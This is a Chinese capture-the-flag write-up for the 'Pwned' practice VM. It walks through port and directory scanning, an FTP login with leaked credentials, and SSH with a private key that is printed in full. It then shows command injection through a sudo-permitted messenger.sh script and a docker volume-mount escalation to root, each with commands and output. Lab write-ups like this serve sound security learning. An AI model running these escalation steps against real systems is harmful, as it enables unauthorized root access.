pwned 靶机WP

社工（不是）
学习了docker提权
对信息收集有了更深的感悟
复习了sudo横向提权普通用户，shell脚本审计
了解了一段精彩的故事

nmap扫描

1. ┌──(kali㉿kali)-[~/pwned]
2. └─$ cat nmapscan/*.nmap
3. # Nmap 7.95 scan initiated Wed Jul 23 23:27:31 2025 as: /usr/lib/nmap/nmap --privileged -sT -sC -sV -O -p21,22,80 -oA nmapscan/detail 192.168.140.230
4. Nmap scan report for 192.168.140.230
5. Host is up (0.0020s latency).
7. PORT   STATE SERVICE VERSION
8. 21/tcp open  ftp     vsftpd 3.0.3
9. 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
10. | ssh-hostkey:
11. |   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
12. |   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
13. |_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
14. 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
15. |_http-server-header: Apache/2.4.38 (Debian)
16. |_http-title: Pwned....!!
17. MAC Address: 08:00:27:E5:2A:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
18. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
19. Device type: general purpose|router
20. Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
21. OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
22. OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
23. Network Distance: 1 hop
24. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
26. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
27. # Nmap done at Wed Jul 23 23:27:41 2025 -- 1 IP address (1 host up) scanned in 10.10 seconds
28. # Nmap 7.95 scan initiated Thu Jul 24 02:23:56 2025 as: /usr/lib/nmap/nmap --privileged -p- -oA ports 192.168.140.230
29. Nmap scan report for 192.168.140.230
30. Host is up (0.0024s latency).
31. Not shown: 65532 closed tcp ports (reset)
32. PORT   STATE SERVICE
33. 21/tcp open  ftp
34. 22/tcp open  ssh
35. 80/tcp open  http
36. MAC Address: 08:00:27:E5:2A:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
38. # Nmap done at Thu Jul 24 02:24:14 2025 -- 1 IP address (1 host up) scanned in 18.53 seconds
39. # Nmap 7.95 scan initiated Wed Jul 23 23:30:21 2025 as: /usr/lib/nmap/nmap --privileged --script=vuln -p21,22,80 -oA nmapscan/vuln 192.168.140.230
40. Nmap scan report for 192.168.140.230
41. Host is up (0.0015s latency).
43. PORT   STATE SERVICE
44. 21/tcp open  ftp
45. 22/tcp open  ssh
46. 80/tcp open  http
47. |_http-dombased-xss: Couldn't find any DOM based XSS.
48. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49. |_http-csrf: Couldn't find any CSRF vulnerabilities.
50. | http-enum:
51. |_  /robots.txt: Robots file
52. MAC Address: 08:00:27:E5:2A:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
54. # Nmap done at Wed Jul 23 23:30:52 2025 -- 1 IP address (1 host up) scanned in 31.64 seconds

复制代码

ftp尝试匿名访问失败
遂访问80端口
web渗透

页面中写道这位attacker利用企业员工成功hack服务器
查看源码：该attacker注释中写道：

1. [/code]应该是无效信息
2. 刚才nmap脚本扫描提示有robots.txt
3. 访问：
4. [code]# Group 1
6. User-agent: *
7. Allow: /nothing

复制代码

访问nothing

查看源码：

扫描目录，dirb没有扫出额外信息
使用gobuster扫描的很慢
当时gobuster扫了很久没扫出额外信息
其他能够看的地方也都看过了
一般这种时候，引用一位老师的一句话：

当我把所有的信息都，每个方向的信息都努力去尝试，
结果发现就是没有找到相关的利用点，
没有一个checkpot切入点
那么我认为就是信息收集的还不够

所以这里，只有非常耐心的等待gobuster扫完（感觉是扫的最久的一次）

扫出了hidden_text目录
访问，有一个secret.dic,写道

把这个复制或下载下来作为字典在爆破一次目录

1. ┌──(kali㉿kali)-[~/pwned]
2. └─$ gobuster dir -u http://192.168.140.230 -w dic.txt
3. ===============================================================
4. Gobuster v3.6
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.140.230
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                dic.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.6
13. [+] Timeout:                 10s
14. ===============================================================
15. Starting gobuster in directory enumeration mode
16. ===============================================================
17. /pwned.vuln           (Status: 301) [Size: 323] [--> http://192.168.140.230/pwned.vuln/]                                                              
18. Progress: 21 / 22 (95.45%)
19. ===============================================================
20. Finished
21. ===============================================================

复制代码

访问之后是一个登录界面
查看源码可以得到

1. [/code]这个参数值输入登录表单无响应
2. 但是结合用户名为ftpuser,所以ftp尝试用这个用户密码连接
3. [code]┌──(kali㉿kali)-[~/pwned]
4. └─$ ftp 192.168.140.230
5. Connected to 192.168.140.230.
6. 220 (vsFTPd 3.0.3)
7. Name (192.168.140.230:kali): ftpuser
8. 331 Please specify the password.
9. Password:
10. 230 Login successful.
11. Remote system type is UNIX.
12. Using binary mode to transfer files.
13. ftp>

复制代码

连接成功
get所有能够获取的文件

1. ┌──(kali㉿kali)-[~/pwned]
2. └─$ ftp 192.168.140.230
3. Connected to 192.168.140.230.
4. 220 (vsFTPd 3.0.3)
5. Name (192.168.140.230:kali): ftpuser
6. 331 Please specify the password.
7. Password:
8. 230 Login successful.
9. Remote system type is UNIX.
10. Using binary mode to transfer files.
11. ftp> ls229 Entering Extended Passive Mode (|||28433|)150 Here comes the directory listing.drwxr-xr-x    2 0        0            4096 Jul 10  2020 share226 Directory send OK.ftp> cd share250 Directory successfully changed.ftp> ls229 Entering Extended Passive Mode (|||63375|)150 Here comes the directory listing.-rw-r--r--    1 0        0            2602 Jul 09  2020 id_rsa-rw-r--r--    1 0        0              75 Jul 09  2020 note.txt226 Directory send OK.ftp> mget *mget id_rsa [anpqy?]? y229 Entering Extended Passive Mode (|||44380|)150 Opening BINARY mode data connection for id_rsa (2602 bytes).100% |******************************|  2602      641.66 KiB/s    00:00 ETA226 Transfer complete.2602 bytes received in 00:00 (273.22 KiB/s)mget note.txt [anpqy?]? y229 Entering Extended Passive Mode (|||43452|)150 Opening BINARY mode data connection for note.txt (75 bytes).100% |******************************|    75       26.11 KiB/s    00:00 ETA226 Transfer complete.75 bytes received in 00:00 (9.35 KiB/s)ftp> cd ../250 Directory successfully changed.ftp> ls229 Entering Extended Passive Mode (|||33346|)150 Here comes the directory listing.drwxr-xr-x    2 0        0            4096 Jul 10  2020 share226 Directory send OK.ftp> cd ../250 Directory successfully changed.ftp> ls229 Entering Extended Passive Mode (|||44849|)150 Here comes the directory listing.drwxrwx---    4 1000     1000         4096 Jul 10  2020 arianadrwxrwxrwx    3 0        0            4096 Jul 09  2020 ftpuser-rwxr-xr-x    1 0        0             367 Jul 10  2020 messenger.shdrwxrwx---    4 1001     0            4096 Jul 24 14:02 selena226 Directory send OK.ftp> get messenger.shlocal: messenger.sh remote: messenger.sh229 Entering Extended Passive Mode (|||7324|)150 Opening BINARY mode data connection for messenger.sh (367 bytes).100% |******************************|   367       88.47 KiB/s    00:00 ETA226 Transfer complete.367 bytes received in 00:00 (40.38 KiB/s)ftp> quit221 Goodbye.

复制代码

查看获取的文件

1. ┌──(kali㉿kali)-[~/pwned]
2. └─$ cat note.txt
4. Wow you are here
6. ariana won't happy about this note
8. sorry ariana :(
10.                                                                            
11. ┌──(kali㉿kali)-[~/pwned]
12. └─$ cat id_rsa  
13. -----BEGIN OPENSSH PRIVATE KEY-----
14. b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
15. NhAAAAAwEAAQAAAYEAthncqHSPVcE7xs136G/G7duiV6wULU+1Y906aF3ltGpht/sXByPB
16. aEzxOfqRXlQfkk7hpSYk8FCAibxddTGkd5YpcSH7U145sc2n7jwv0swjMu1ml+B5Vra7JJ
17. 0cP/I27BcjMy7BxRpugZQJP214jiEixOK6gxTILZRAfHedblnd2rW6PhRcQK++jcEFM+ur
18. gaaktNdFyK4deT+YHghsYAUi/zyWcvqSOGy9iwO62w4TvMfYRaIL7hzhtvR6Ze6aBypqhV
19. m1C6YIIddYcJuXCV/DgiWXTIUQnhl38/Hxp0lzkhcN8muzOAmFMehktm3bX+y01jX+LziU
20. GDYM7cTQitZ0MhPDMwIoR0L89mjP4lVyX4A0kn/MxQaj4IxQnY7QG4D4C1bMIYJ0IA//k9
21. d4h0SNcEOlgDCZ0yCLZQeN3LSBe2IR4qFmdavyXJfb0Nzn5jhfVUchz9N9S8prP6+y3exZ
22. ADnomqLN1eMcsmu8z5v7w0q7Iv3vS2XMc/c7deZDAAAFiH5GUFF+RlBRAAAAB3NzaC1yc2
23. EAAAGBALYZ3Kh0j1XBO8bNd+hvxu3bolesFC1PtWPdOmhd5bRqYbf7FwcjwWhM8Tn6kV5U
24. H5JO4aUmJPBQgIm8XXUxpHeWKXEh+1NeObHNp+48L9LMIzLtZpfgeVa2uySdHD/yNuwXIz
25. MuwcUaboGUCT9teI4hIsTiuoMUyC2UQHx3nW5Z3dq1uj4UXECvvo3BBTPrq4GmpLTXRciu
26. HXk/mB4IbGAFIv88lnL6kjhsvYsDutsOE7zH2EWiC+4c4bb0emXumgcqaoVZtQumCCHXWH
27. Cblwlfw4Ill0yFEJ4Zd/Px8adJc5IXDfJrszgJhTHoZLZt21/stNY1/i84lBg2DO3E0IrW
28. dDITwzMCKEdC/PZoz+JVcl+ANJJ/zMUGo+CMUJ2O0BuA+AtWzCGCdCAP/5PXeIdEjXBDpY
29. AwmdMgi2UHjdy0gXtiEeKhZnWr8lyX29Dc5+Y4X1VHIc/TfUvKaz+vst3sWQA56JqizdXj
30. HLJrvM+b+8NKuyL970tlzHP3O3XmQwAAAAMBAAEAAAGACQ18FLvGrGKw0A9C2MFFyGlUxr
31. r9Pctqnw5OawXP94oaVYUb/fTfFopMq68zLtdLwoA9Y3Jj/7ZgzXgZxUu0e2VxpfgkgF58
32. y8QHhyZi0j3nug5nPUGhhpgK8aUF1H/8DvyPeWnnpB7OQ47Sbt7IUXiAO/1xfDa6RNnL4u
33. QnZWb+SnMiURe+BlE2TeG8mnoqyoU4Ru00wOc2++IXc9bDXHqk5L9kU071mex99701utIW
34. VRoyPDP0F+BDsE6zDwIvfJZxY2nVAZkdxZ+lit5XCSUuNr6zZWBBu9yAwVBaeuqGeZtiFN
35. W02Xd7eJt3dnFH+hdy5B9dD+jTmRsMkwjeE4vLLaSToVUVl8qWQy2vD6NdS3bdyTXWQWoU
36. 1da3c1FYajXHvQlra6yUjALVLVK8ex4xNlrG86zFRfsc1h2CjqjRqrkt0zJr+Sl3bGk+v6
37. 1DOp1QYfdD1r1IhFpxRlTt32DFcfzBs+tIfreoNSakDLSFBK/G0gQ7acfH4uM9XbBRAAAA
38. wQC1LMyX0BKA/X0EWZZWjDtbNoS72sTlruffheQ9AiaT+fmbbAwwh2bMOuT5OOZXEH4bQi
39. B7H5D6uAwhbVTtBLBrOc5xKOOKTcUabEpXJjif+WSK3T1Sd00hJUnNsesIM+GgdDhjXbfx
40. WY9c2ADpYcD/1g+J5RRHBFr3qdxMPi0zeDZE9052VnJ+WdYzK/5O3TT+8Bi7xVCAZUuQ1K
41. EcP3XLUrGVM6Usls4DEMJnd1blXAIcwQkAqGqwAHHuxgBIq64AAADBAN0/SEFZ9dGAn0tA
42. Qsi44wFrozyYmr5OcOd6JtK9UFVqYCgpzfxwDnC+5il1jXgocsf8iFEgBLIvmmtc7dDZKK
43. mCup9kY+fhR8wDaTgohGPWC6gO/obPD5DE7Omzrel56DaPwB7kdgxQH4aKy9rnjkgwlMa0
44. hPAK+PN4NfLCDZbnPbhXRSYD+91b4PFPgfSXR06nVCKQ7KR0/2mtD7UR07n/sg2YsMeCzv
45. m9kzzd64fbqGKEsRAUQJOCcgmKG2Zq3wAAAMEA0rRybJr61RaHlPJMTdjPanh/guzWhM/C
46. b0HDZLGU9lSEFMMAI+NPWlv9ydQcth6PJRr/w+0t4IVSKClLRBhbUJnB8kCjMKu56RVMkm
47. j6dQj+JUdPf4pvoUsfymhT98BhF9gUB2K+B/7srQ5NU2yNOV4e9uDmieH6jFY8hRo7RRCo
48. N71H6gMon74vcdSYpg3EbqocEeUN4ZOq23Bc5R64TLu2mnOrHvOlcMzUq9ydAAufgHSsbY
49. GxY4+eGHY4WJUdAAAADHJvb3RAQW5ubHlubgECAwQFBg==
50. -----END OPENSSH PRIVATE KEY-----

复制代码

note.txt和id_rsa在ftp的一个目录下，这说明这个id_rsa很可能是ariana的

1. ┌──(kali㉿kali)-[~/pwned]
2. └─$ chmod 600 id_rsa
3.                                                                            
4. ┌──(kali㉿kali)-[~/pwned]
5. └─$ ssh ariana@192.168.140.230 -i id_rsa
6. Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
8. The programs included with the Debian GNU/Linux system are free software;
9. the exact distribution terms for each program are described in the
10. individual files in /usr/share/doc/*/copyright.
12. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
13. permitted by applicable law.
14. Last login: Thu Jul 24 14:51:38 2025 from 192.168.140.132
15. ariana@pwned:~$

复制代码

连接成功
此外还有一个文件messenger.sh，暂时还没用上

1. ┌──(kali㉿kali)-[~/pwned]
2. └─$ cat messenger.sh
3. #!/bin/bash
5. clear
6. echo "Welcome to linux.messenger "
7.                 echo ""
8. users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
9.                 echo ""
10. echo "$users"
11.                 echo ""
12. read -p "Enter username to send message : " name
13.                 echo ""
14. read -p "Enter message for $name :" msg
15.                 echo ""
16. echo "Sending message to $name "
18. $msg 2> /dev/null
20.                 echo ""
21. echo "Message sent to $name :) "
22.                 echo ""

复制代码

可以注意到 $msg 2> /dev/null很有意思，它把我们输入的msg的内容作为命令输出
提权

枚举

1. ariana@pwned:~$ sudo -l
2. Matching Defaults entries for ariana on pwned:
3.     env_reset, mail_badpass,
4.     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
6. User ariana may run the following commands on pwned:
7.     (selena) NOPASSWD: /home/messenger.sh

复制代码

可以无密码的以selena用户的身份执行
我们之前已经分析了messenger.sh可以执行你输入的命令
所以这里执行时以selena的身份可以打开一个shell

1. ariana@pwned:~$ sudo -u selena /home/messenger.sh

复制代码

1. Welcome to linux.messenger
4. ariana:
5. selena:
6. ftpuser:
8. Enter username to send message : hhh
10. Enter message for hhh :bash
11. Sending message to hhh
12. id
13. uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
14. whoami
15. selena

复制代码

成功切换到selena用户，id看到docker
尝试docker提权
docker提权参考大佬文章：https://blog.csdn.net/nicai321/article/details/122266988

1. Sending message to hhh
2. id
3. uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
4. whoami
5. selena
6. docker run -v /:/mnt -it alpine
7. / # ls
8. bin    etc    lib    mnt    proc   run    srv    tmp    var
9. dev    home   media  opt    root   sbin   sys    usr
10. / # cd mnt
11. /mnt # cd root
12. /mnt/root # id
13. uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
14. /mnt/root # whoami
15. root
16. /mnt/root # ls
17. root.txt
18. /mnt/root # cat root.txt
19. 4d4098d64e163d2726959455d046fd7c
23. You found me. i dont't expect this （◎ . ◎）
25. I am Ajay (Annlynn) i hacked your server left and this for you.
27. I trapped Ariana and Selena to takeover your server :)
30. You Pwned the Pwned congratulations :)
32. share the screen shot or flags to given contact details for confirmation
34. Telegram   https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g
36. Instgarm   ajs_walker
38. Twitter    Ajs_walker
39. /mnt/root #

复制代码

（这里切换到selena交互性不太好，我最初试着在反弹了一次shell，这样docker提权好像是无法成功的，要在ssh切换后这个shell docker提权）
这里相当于把环境挂载到mnt里了，所以要注意cd mnt后是cd root不是/root不然没东西

来源：程序园用户自行投稿发布，如果侵权，请联系站长删除
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！